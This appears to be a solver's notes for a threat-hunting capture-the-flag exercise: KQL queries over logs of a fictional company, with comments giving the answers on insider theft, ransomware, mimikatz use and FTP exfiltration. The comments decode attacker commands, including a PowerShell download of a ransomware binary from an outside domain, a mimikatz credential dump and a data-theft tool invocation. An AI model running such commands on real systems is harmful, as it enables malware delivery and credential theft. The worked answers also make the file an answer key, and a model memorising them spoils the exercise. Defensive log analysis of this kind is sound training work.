//KQL101
Employees
| where ip_addr contains "10.10.0.216" //Nakia Acosta nakia_acosta@encryptoderafinancial.com naacosta IT Helpdesk Technician

Email
| where recipient contains "nakia_acosta@encryptoderafinancial.com"
| count 

Email
| where sender contains "bitbingersbanking.net"
| distinct sender
| count 

Employees
| where name contains "Timothy Geffre" //10.10.1.73 timothy_geffre@encryptoderafinancial.com tigeffre Sales Representative

OutboundNetworkEvents
| where src_ip contains "10.10.1.73"
| distinct url
| count 

PassiveDns
| where domain contains "money"
| distinct domain
| count 

PassiveDns
| where domain == "moneyppl.com"
| distinct ip //211.152.115.93

let karen_ips = 
Employees
| where name has "Karen"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in (karen_ips)
|distinct url
| count 

let karen_attempt = Employees
| where name has "Karen"
| distinct username;
AuthenticationEvents
| where username in (karen_attempt)
| count

//Offensive Odor Question 1

//What is Barry's role at the company?
Employees
| where name contains "Barry" //StackOverflow Copy Paster 10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com

Email
| where sender contains "barry_shmelly@encryptoderafinancial.com"
| where timestamp between (datetime(2024-01-16) .. datetime(2024-01-16 23:59:59))
| project timestamp, subject, recipient, link

Employees
| where name has_any ("christopher", "michelle" , "jarrod" , "software_eng")
| project name, role

Email
| where sender contains "barry_shmelly@encryptoderafinancial.com"
| where timestamp between (datetime(2024-01-18) .. datetime(2024-01-18 23:59:59))
| where subject contains "YOU ARE A GREEDY PIG!!!! WHAT IS WRONG WITH YOU?????" //"les_goh@encryptoderafinancial.com"

Employees
| where name contains "les_goh" or name contains "les" or name contains "goh"
| project name, role

//What was the complete URL that Barry was browsing on his computer regarding Cybersecurity Insiders on the afternoon of December 26th?(Paste the full url)


let Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com
Employees
| where name has "Barry"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in (Barry_ips)
| where timestamp between (datetime(2023-12-26 12:00:00 ) .. datetime(2024-01-18 23:59:59))
| project url, timestamp //https://www.cybersecurity-insiders.com/safe-ways-to-transfer-sensitive-files

//What website did he visit first on January 15th? (Paste the full URL)
let Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com
Employees
| where name has "Barry"
| distinct ip_addr;
OutboundNetworkEvents
| where src_ip in (Barry_ips)
| where timestamp between (datetime(2024-01-15) .. datetime(2024-01-15 23:59:59))
| project url, timestamp //https://www.7-zip.org/a/7z2002-x64.exe

//Could you provide the full URL for the website Barry searched for USB Flash Drives?

//https://www.wikihow.com/Use-a-USB-Flash-Drive

//What "secret" document on business transactions did Barry download?

let  Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com
Employees
| where name has "Barry"
| distinct ip_addr;
InboundNetworkEvents
| where src_ip in (Barry_ips)
//| where timestamp between (datetime(2024-01-15) .. datetime(2024-01-15 23:59:59))
| where url contains ".doc" or url contains ".pdf" or url contains ".ppt" or url contains "secret" //SECRET_MergersAndAcquisitions_Strategy2025.docx
| project url, timestamp

//What document (docx) did Barry download about salaries?

let  Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com
Employees
| where name has "Barry"
| distinct ip_addr;
InboundNetworkEvents
| where src_ip in (Barry_ips)
//| where timestamp between (datetime(2024-01-15) .. datetime(2024-01-15 23:59:59))
| where url contains ".doc" and  url contains "salary"
| project url, timestamp //ExecutiveSalaryNegotiations.docx

//What document (zip) did Barry download to get this?

let  Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com
Employees
| where name has "Barry"
| distinct ip_addr;
InboundNetworkEvents
| where src_ip in (Barry_ips)
//| where timestamp between (datetime(2024-01-15) .. datetime(2024-01-15 23:59:59))
| where url contains ".zip" and  url contains "algo"
| project url, timestamp //Encryptodera_Proprietary_Algorithms.zip

//Do you know the password he used to zip the files?

let  Barry_ips =  //10.10.0.1 bashmelly barry_shmelly@encryptoderafinancial.com username=robriggs,  hostname
Employees
| where name has "Barry"
| distinct username;
ProcessEvents
| where username  in (Barry_ips)
//| where timestamp between (datetime(2024-01-15) .. datetime(2024-01-15 23:59:59))
| where process_commandline contains ".zip" or   process_commandline contains "pass"
| project timestamp,process_commandline, parent_process_name, hostname, username //Encryptodera_Proprietary_Algorithms.zip
//| take 10 // Password  = securePass123
//What is the name of the drive on which Barry stored the final files? E:\SchmellyDrive\

//2. Crypto Conquest

//What is the filename of this note? YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt
// attack ; ransomware

//On how many machines was this .txt file seen? 306
FileCreationEvents
| where filename contains "YOU_GOT_CRYTOED_SO_GIMME_CRYPTO.txt"
| project timestamp, hostname, username, filename, process_name
| order by timestamp asc
// What time was the ransom note first seen? 2024-02-17T02:34:54.000Z // hostname: UL8R-MACHINE

//Look closer at UL8R-MACHINE around the time when the ransom note was seen (2024-02-17).
//How many files were encrypted on this machine? 50 extension umadbro
FileCreationEvents
| where hostname contains "UL8R-MACHINE"
//| take 10
| where filename contains ".umadbro"
//| where timestamp between (datetime(2024-02-17) .. datetime(2024-02-17 23:59:59))
//| count
| project timestamp, filename, hostname
| order by timestamp asc
//That looks like a ransomware extension! Instead of the typical .encrypted, this ransomware is appending .umadbro to files

//What command was run that references the ransomware extension?
ProcessEvents
| where hostname == "UL8R-MACHINE"
| where process_commandline has ".umadbro" //start /b C:\\ProgramData\\files_go_byebye.exe -encrypt -target C:\\Users\\ -ext .umadbro

//When did files_go_byebye.exe appear on this machine?
FileCreationEvents
| where hostname contains "UL8R-MACHINE"
| where filename contains "files_go_byebye.exe"
| project timestamp, filename, hostname //2024-02-17T02:30:50.000Z

//How many commands were run on UL8R-MACHINE during this timeframe? 23

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| where process_commandline contains "powershell"
| where process_commandline contains "-enc"
//| where process_commandline has_any ("-enc", "-encodedcommand", "base64")
//What domain does the encoded PowerShell reference?
//cG93ZXJzaGVsbCAtYyAiSW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vbm90aWZpY2F0aW9uLWZpbmFuY2Utc2VydmljZXMuY29tL2ZpbGVzX2dvX2J5ZWJ5ZS5leGUgLU91dEZpbGUgQzpcXFByb2dyYW1EYXRhXFxmaWxlc19nb19ieWVieWUuZXhlIg==
// use cyberchef
//powershell -c "Invoke-WebRequest -Uri http://notification-finance-services.com/files_go_byebye.exe -OutFile C:\\ProgramData\\files_go_byebye.exe"
//2024-02-17T02:29:53.000Z
//What command is run right before the base64-encoded PowerShell?

ProcessEvents
| where hostname == "UL8R-MACHINE"
| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| order by timestamp asc
| project timestamp, process_commandline
| where next(process_commandline) contains "-enc" //gpupdate /force

//How many devices ran the gpupdate /force command? //306
ProcessEvents
//| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| where process_commandline contains "gpupdate /force"
| order by timestamp asc
| project timestamp, process_commandline, hostname

//How many machines at Encryptodera ran "systeminfo"? //8
ProcessEvents
//| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| where process_commandline contains "systeminfo"
| order by timestamp asc
| take 1 //2024-02-02T03:32:36.000Z

//How many days elapsed between when the attackers ran discovery commands and when the ransomware attack started?

// Step 1 - First discovery command
ProcessEvents
| where process_commandline contains "systeminfo"
| summarize first_discovery = min(timestamp) //2024-02-02T03:32:36.000Z

// Step 2 - Ransomware start
FileCreationEvents
| where hostname == "UL8R-MACHINE"
| where filename contains "files_go_byebye.exe"
| summarize ransomware_start = min(timestamp) //2024-02-17T02:30:50.000Z

//Then calculate the difference:
print days_elapsed = datetime_diff('day', datetime(2024-02-17), datetime(2024-02-02))

//What is the hostname of the device on which the attackers first ran systeminfo?
ProcessEvents
//| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
| where process_commandline contains "systeminfo"
| order by timestamp asc
| take 1 //2024-02-02T03:32:36.000Z
| project timestamp, process_commandline, hostname //41QI-LAPTOP

//What was the full commandline used by the threat actor when running nltest /dclist?
ProcessEvents
| where hostname == "41QI-LAPTOP"
| where process_commandline contains "nltest /dclist"
//| where timestamp between (datetime("2024-02-16") .. datetime("2024-02-18"))
//| order by timestamp asc
| project timestamp, process_commandline //cmd.exe /C nltest /dclist:encryptoderafinancial.com

//What is the full name of the .xlsx.exe file on 41QI-LAPTOP?
FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where filename contains ".xlsx.exe"//Company_Financials_Q1_2024_Review.xlsx.exe 2024-02-01T08:50:12.000Z

//What file shows up a few seconds after the .xlsx.exe file?
FileCreationEvents
| where hostname == "41QI-LAPTOP"
| where timestamp between (datetime(2024-02-1 8:50:12) .. datetime(2024-02-1 8:50:50))
//screenconnect_client.exe

//How many devices does screenconnect_client.exe appear on? 3
FileCreationEvents
| where filename contains "screenconnect_client.exe"
| project timestamp, filename, hostname
| order by timestamp asc
//QW91-MACHINE, 41QI-LAPTOP, 3RMK-DESKTOP

//Check the Email logs to see if the .xlsx.exe file was sent in a link. What email address was used to send this file?
Email
| where link contains "Company_Financials_Q1_2024_Review.xlsx.exe"
//barry_shmelly@encryptoderafinancial.com

//How many unusual emails were sent by Barry? 9
Email
| where sender contains "barry_shmelly@encryptoderafinancial.com"
| where timestamp >= datetime(2024-02-01)

//What IP was used to sign into Barry's account on February 1st? bary hostname = IGOY-DESKTOP, IP==10.10.0.1 username==bashmelly
AuthenticationEvents
| where username contains "bashmelly"
| where timestamp between (datetime(2024-02-1 ) .. datetime(2024-02-1 23:59:59))
// src_IP==143.38.175.105 , and hostname==MAIL-SERVER01 ; username== bashmelly

//How many other accounts did that IP log into? 0
AuthenticationEvents
| where src_ip == "143.38.175.105"

//How many IPs logged in to all 8 devices where the attacker ran systeminfo? 2
let hosts = ProcessEvents
| where process_commandline has "systeminfo"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| summarize dcount(hostname) by src_ip
| order by dcount_hostname desc

//What is the role of the employee who this IP address belongs to? System Administrator
Employees
| where ip_addr contains "10.10.0.138"
| project role

//How many successful logins were made from this IP? 554
AuthenticationEvents
| where src_ip contains "10.10.0.138"
| where result contains "successful"
| where hostname !contains "MAIL" and hostname contains "SERVER" //DOMAIN_CONTROLLER_SERVER 
| order by timestamp desc

//What is the hostname of the server the attackers logged into?//DOMAIN_CONTROLLER_SERVER 

//3: F in the chat 

//What username was used to log into the DOMAIN_CONTROLLER_SERVER?

AuthenticationEvents
| where hostname contains "DOMAIN_CONTROLLER_SERVER" // username == lihenry_domain_admin

//What laptop did the lihenry_domain_admin account sign into? (Enter the hostname)

AuthenticationEvents
| where username contains "lihenry_domain_admin" //GJ95-LAPTOP

//What is the MITRE ATT&CK ID for mimikatz?
// Software ID: S0002 — that's Mimikatz's own entry in the MITRE software catalog

//Did the threat actor run mimikatz on this device? If so, enter the command line the attacker ran. 
ProcessEvents
| where process_commandline contains "mimikatz" //totally_not_mimikatz.exe "sekurlsa::logonpasswords"
//Who does this device belong to? (Enter the employee's name)

Employees
| where hostname contains "GJ95-LAPTOP" //Valerie Orozco, valerie_orozco@encryptoderafinancial.com, vaorozco, ip_addr== 10.10.0.18

//Was Valerie Orozco targeted in the phishing emails sent from Barry Shmelly?
Email
| where sender contains "barry_shmelly@encryptoderafinancial.com" and recipient contains "valerie_orozco@encryptoderafinancial.com"
//| 2024-02-01T02:40:30.000Z
//| project timestamp, subject, recipient, link
//What is the name of the file that was sent to Valerie in the phishing email?//
//Employee_Contact_List_Updated_March_2024.docx.exe

//Did Valerie click the link? If so, enter the timestamp when she clicked the link. If not, enter 'no'

OutboundNetworkEvents
| where src_ip == "10.10.0.18"
| where url contains "Employee_Contact_List_Updated_March_2024.docx.exe" //no


//http://update-finance-security.biz/public/images/files/Employee_Contact_List_Updated_March_2024.docx.exe

//How many different user accounts logged into Valerie's machine?
AuthenticationEvents
| where hostname contains "GJ95-LAPTOP"
| distinct username //3, username vaorozco, systadmi_local_admin, lihenry_domain_admin

//How many unique hosts did this user account attempt to log into? username == systadmi_local_admin

AuthenticationEvents
| where username contains "systadmi_local_admin"
| distinct hostname //10, YRLR-MACHINE 3RMK-DESKTOP IWWS-LAPTOP MEED-DESKTOP QW91-MACHINE Z9UO-DESKTOP GJ95-LAPTOP

//Which user NOT in an IT role was improperly using the systadmi_local_admin credentials? (This is likely a sign of compromise)

let hosts = FileCreationEvents
| where filename has "screenconnect"
| distinct hostname;
AuthenticationEvents
| where hostname in (hosts)
| where username has "systadmi"
| where result has "Successful"
| join (
    Employees 
    | project ip_addr,role,email_addr,name
) on $left.src_ip==$right.ip_addr
| project SourceIpName=name, a="who is a", SourceIpUserRole=role, b="logged onto",hostname, c="using", username, d="at",timestamp

// Risk Analyst Robin Kirby

//When was Robin phished by Barry Shmelly's account?
Email
| where sender contains "barry_shmelly@encryptoderafinancial.com" and recipient contains "robin_kirby@encryptoderafinancial.com"
// 2024-02-01T03:59:30.000Z

//4: A Network Mystery
//Which IP address received the largest amount of data on Feb 5th?

NetworkFlow
| where timestamp between (datetime(2024-02-05) .. datetime(2024-02-05 23:59:59))
| top 1 by  bytes desc // dest_ip == 182.56.23.121 TCP protocol des_port==21

//How many bytes of data were sent to that IP on the 5th?12716
//When was data first sent to this IP? (paste the full timestamp)

NetworkFlow
| where dest_ip == "182.56.23.121"
| project timestamp, dest_ip, bytes //2024-01-21T13:28:33.000Z

//On how many distinct days have we sent data to this IP?
NetworkFlow
| where dest_ip == "182.56.23.121"
| summarize distinct_days = dcount(bin(timestamp, 1d)) //27 days

//What service is used for the port to which this data is being transferred?
NetworkFlow
| where dest_ip == "182.56.23.121"
//|project dest_port, src_port //des_port==21 (FTP)

//What is the total amount of data transferred to this IP address?
NetworkFlow
| where dest_ip == "182.56.23.121"
| summarize total_bytes = sum(bytes) //208138

//How many distinct employees have sent data to this IP address?
NetworkFlow
| where dest_ip == "182.56.23.121"
| distinct src_ip //10.10.0.2
//| count //1

//Whose name is linked to that IP address? Provide the employee's name.
Employees
| where ip_addr == "10.10.0.2" //Jane Smith

//What is that employee's role? Cryto Bruh (Blockchain Contractor)

//We see her looking for the location of the company's __ __ __ __ (4 words)

InboundNetworkEvents
| where src_ip == "10.10.0.2"
| where url contains "location"//cold storage crypto wallets

//Who was Jane having a suspicious conversation with? (email address)
Email
| where recipient  contains "Jane_smith"
| take 10 //elboss@westealurcrypto.com

//What IP address did the boss man provide to help with smuggling the data?
Email
| where sender  contains "elboss@westealurcrypto.com" //182.56.23.121

//Jane has a plan, oh so grand, to steal all the crypto in the land.
//But she can't quite do it with an empty hand.
//What is the name of the data exfil tool Jane downloads to help with her operation?

FileCreationEvents
| where username contains "jasmith"
| where filename has_any (".exe", ".zip", ".ps1")
| project timestamp, filename, hostname
| order by timestamp asc
//ftp_client.exe

//What is the name of the crypto theft tool Jane downloads to help with her operation? check the query above
//crypto_stealer.exe

//Now that Jane has the tool, she has us looking like fools.Jane executes a command to stage the data she will steal.
//To what path does Jane point her data exfiltration tool?

ProcessEvents
| where username contains "jasmith"
| where process_name contains "steal"
| project timestamp, process_name, process_commandline
| order by timestamp asc
//C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc Y3J5cHRvX3N0ZWFsZXIuZXhlIC0tZGFpbHkgLS1pbnB1dCBcXFxcTmV0d29ya1NoYXJlXFxjcml0aWNhbF9pbmZyYXN0cnVjdHVyZVxcQ3J5cHRvX1dhbGxldF9TdG9yYWdlX0xvY2F0aW9uc1xcIC0tb3V0cHV0IEM6XFxVc2Vyc1xcamFzbWl0aFxcVG9UaGVNb29uXFw=
//use cyberchef to encrypt
// after entcryptio we have the path crypto_stealer.exe --daily --input \\\\NetworkShare\\critical_infrastructure\\Crypto_Wallet_Storage_Locations\\ --output 
//that is the path C:\\Users\\jasmith\\ToTheMoon\\

//What password does Jane use for the tool? hostname ==GOTI-LAPTOP IP "10.10.0.2" username ==jasmith
ProcessEvents
| where process_name contains "cmd" and username == "jasmith"
// KCAnXFxub29NZWhUb1RcXGh0aW1zYWpcXHNyZXNVXFw6QyBodGFwLS0gMTIxLjMyLjY1LjI4MSBwaS0tIDEyIHRyb3AtLSAibW9jLmxhaWNuYW5pZmFyZWRvdHB5cmNuZSIgbWl0Y2l2LS0gNURONEhydUZGMHRpM2s0dGxsM3dPVFlSQ2hjdW0ydG9nVSBzc2FwLS0gaHRpbXNhaiByZXN1LS0geWxpYWQtLSBleGUudG5laWxjX3B0ZicgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn
//use cyberchef 1 from base64 :Result
// \\nooMehToT\\htimsaj\\sresU\\:C htap-- 121.32.65.281 pi-- 12 trop-- 
//"moc.laicnanifaredotpyrcne" mitciv-- 5DN4HruFF0ti3k4tll3wOTYRChcum2togU ssap-- htimsaj resu-- yliad-- 
//exe.tneilc_ptf' -split '' | %{$_[0]}) -join ''
//use cyberchef again and reverse this : 5DN4HruFF0ti3k4tll3wOTYRChcum2togU  ssap
